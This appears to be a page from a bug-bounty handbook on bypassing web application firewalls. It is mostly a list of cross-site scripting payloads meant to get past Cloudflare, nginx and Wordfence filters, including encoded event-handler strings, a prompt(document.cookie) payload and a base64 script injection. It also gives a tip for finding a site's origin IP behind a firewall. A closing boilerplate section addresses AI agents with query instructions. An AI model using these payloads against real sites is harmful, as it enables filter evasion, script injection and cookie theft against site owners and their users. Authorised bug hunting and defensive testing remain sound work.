> For the complete documentation index, see [llms.txt](https://gowthams.gitbook.io/bughunter-handbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/cross-site-scripting/waf-bypas.md).

# WAF Bypass

Cloudflare XSS WAF Bypass:

```
Cloudflare XSS WAF Bypass 

<svg onx=() onload=(confirm)(1)>

New CloudFlare XSS Bypass! 
<svg onload=alert%26%230000000040"1")>

<svg onx=() onload=window.alert?.()>

XSS payload to keep on your notes:

<script>alert(1)</script> -> nginx block

"><img src=x onerror=alert(1)> -> Wordfence block

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -> successful execution

"Onx=() AutOfOcUs OnfOCuS=prompt(document.cookie)>

Bypass Cloudflare payload #bugbountytips #infosec #bugbounty

Bypass Cloudflare XSS payload

"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

#Cloudflare block alert() ,prompt(), confirm()? Just use another function to trigger #XSS lol Smiling face with open mouth and cold sweat

Payload: document.write(atob(`PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==`));


```

![](/files/-Mkp3u7jL5W6Fz3xQnup)

Find IP behind WAF,

![](/files/-Mkp7R08NrY8EJdz2hfE)

* <https://github.com/pielco11/fav-up>

{% embed url="<https://twitter.com/htrgouvea/status/1381601017511477249?s=20>" %}

{% embed url="<https://twitter.com/NetClinch/status/1474033050543476737?s=20>" %}

{% embed url="<https://twitter.com/Mah3Sec_/status/1470857654243246083?s=20>" %}

* <https://www.gabriel.urdhr.fr/2024/11/20/xss-bypass/>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/cross-site-scripting/waf-bypas.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
